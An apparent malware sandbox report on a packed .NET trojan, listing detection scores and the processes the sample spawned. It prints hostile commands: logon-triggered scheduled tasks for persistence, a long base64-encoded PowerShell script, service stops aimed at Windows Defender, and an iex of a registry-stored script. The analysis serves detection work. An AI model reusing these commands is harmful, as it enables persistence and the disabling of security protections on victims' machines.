Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Loader.exe, 00000014.00000002.2527964251.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, tmp5DD6.tmp.dat.21.dr, tmpABDC.tmp.dat.20.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	ReversingLabs: Detection: 73%
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Virustotal: Detection: 82%

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\Client.exe "C:\Users\user\AppData\Local\Temp\Client.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\Infected.exe "C:\Users\user\AppData\Local\Temp\Infected.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\WinDefend.exe "C:\Users\user\AppData\Local\Temp\WinDefend.exe"
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"' & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"' & exit
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF85A.tmp.bat""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF879.tmp.bat""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Loaader.exe C:\Users\user\AppData\Roaming\Loaader.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Loader.exe C:\Users\user\AppData\Roaming\Loader.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Loader.exe "C:\Users\user\AppData\Roaming\Loader.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Loaader.exe "C:\Users\user\AppData\Roaming\Loaader.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\WinDefend.exe "C:\Users\user\AppData\Local\Temp\WinDefend.exe"
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmA
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7384 -s 2720
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\WinDefend.exe "C:\Users\user\AppData\Local\Temp\WinDefend.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: unknown	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\Client.exe "C:\Users\user\AppData\Local\Temp\Client.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\Infected.exe "C:\Users\user\AppData\Local\Temp\Infected.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\WinDefend.exe "C:\Users\user\AppData\Local\Temp\WinDefend.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"' & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF879.tmp.bat""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"' & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF85A.tmp.bat""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Loaader.exe "C:\Users\user\AppData\Roaming\Loaader.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Loader.exe "C:\Users\user\AppData\Roaming\Loader.exe"
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmA
